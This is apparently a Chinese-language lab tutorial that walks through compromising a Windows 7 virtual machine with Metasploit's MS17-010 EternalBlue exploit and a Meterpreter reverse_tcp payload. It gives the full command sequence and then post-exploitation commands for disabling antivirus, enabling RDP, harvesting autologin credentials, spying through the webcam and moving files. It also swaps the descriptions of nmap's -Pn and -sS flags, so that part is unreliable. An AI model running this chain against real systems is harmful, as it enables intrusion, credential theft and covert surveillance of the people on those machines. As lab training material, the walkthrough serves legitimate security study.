##Meterpreter
Meterpreter是Metasploit框架中的一个杀手锏,通常被作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。Meterpreter是Metasploit框架的一个扩展模块,可以调用Metasploit的一些功能,对目标系统进行更为深入的渗透,这些功能包括反追踪、纯内存工作模式、密码哈希值获取、特权提升、跳板攻击等等。
##ms17-010
本次实验通过ms17-010来演示。
##扫描端口
Msf中集合了Nmap,所以我们可以直接在msf中进行扫描。
nmap -Pn -sS -A 192.168.234.152
-Pn
执行一次隐秘的TCP扫描,以确定某个特定的TCP端口是否开放。
-sS
不使用ping命令预先判断主机是否存活,而是默认所有主机都是存活状态。(可以穿透防火墙,避免被发现)
-A
操作系统的扫描、脚本扫描、路由追踪、服务探测。
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: Site doesn’t have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ms-wbt-server?
|_ssl-date: 2019-12-06T09:54:02+00:00; -1s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:E7:B3:33 (VMware)
Device type: firewall
Running (JUST GUESSING): Fortinet embedded (87%)
OS CPE: cpe:/h:fortinet:fortigate_100d
Aggressive OS guesses: Fortinet FortiGate 100D firewall (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: USER-PC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: -2h00m00s, deviation: 3h59m58s, median: -2s
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:e7:b3:33 (VMware)
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: user-PC
| NetBIOS computer name: USER-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-12-06T17:53:58+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-12-06T09:53:57
|_ start_date: 2019-12-04T09:11:36TRACEROUTE
HOP RTT ADDRESS
1 6.10 ms 192.168.234.152OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.71 seconds
该目标主机开启了445端口,我们直接使用msf里的ms17-010进行攻击
##寻找攻击exp
search 17-010
我们选择第三个攻击模块
use exploit/windows/smb/ms17_010_eternalblue
如图所示,即为配置成功:
选择并设置payload
show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp
我们选择第15个基于Windows系统的Meterpreter reverse_tcp(该载荷在攻击成功后,会从目标主机发起一个反弹连接,连接到LHOST中指定的IP地址。这种反弹连接可以让你绕过防火墙的入站流量保护,或者穿透NAT网关。)
如下图所示即为配置成功
配置攻击的参数
show options
现在我们只需要配置两个参数
set LHOST 192.168.234.151(配置攻击机IP)
set RHOSTS 192.168.234.152(配置靶机IP)
实施攻击
如图所示,攻击成功
进入交互命令行shell
输入exit 退出shell
##进程迁移
getpid //查看当前shell的进程号
ps //列出当前所有的进程
找到Explore.exe进程,利用命令 migrate explore.exe的进程号,进行进程迁移。
或者可以利用以下命令自动进行命令迁移
run post/windows/manage/migrate
sysinfo //查看系统信息
run post/windows/manage/killav //杀掉系统杀毒软件
run post/windows/manage/enable_rdp //开启远程桌面
run post/windows/gather/enum_logged_on_users //列举目标机的用户
run post/windows/gather/enum_applications //列举安装在目标机上的应用程序
run windows/gather/credentials/windows_autologin //抓取自动登录的用户名和密码
webcam_list //查看目标机是否有摄像头
webcam_snap //拍一张照片
webcam_stream //开启直播模式
download c:\test.txt/root //下载靶机的text.txt文件到攻击机root目录下
upload /root/test.txt c:\ //上传攻击机root目录下的text.txt文件到目标机C盘下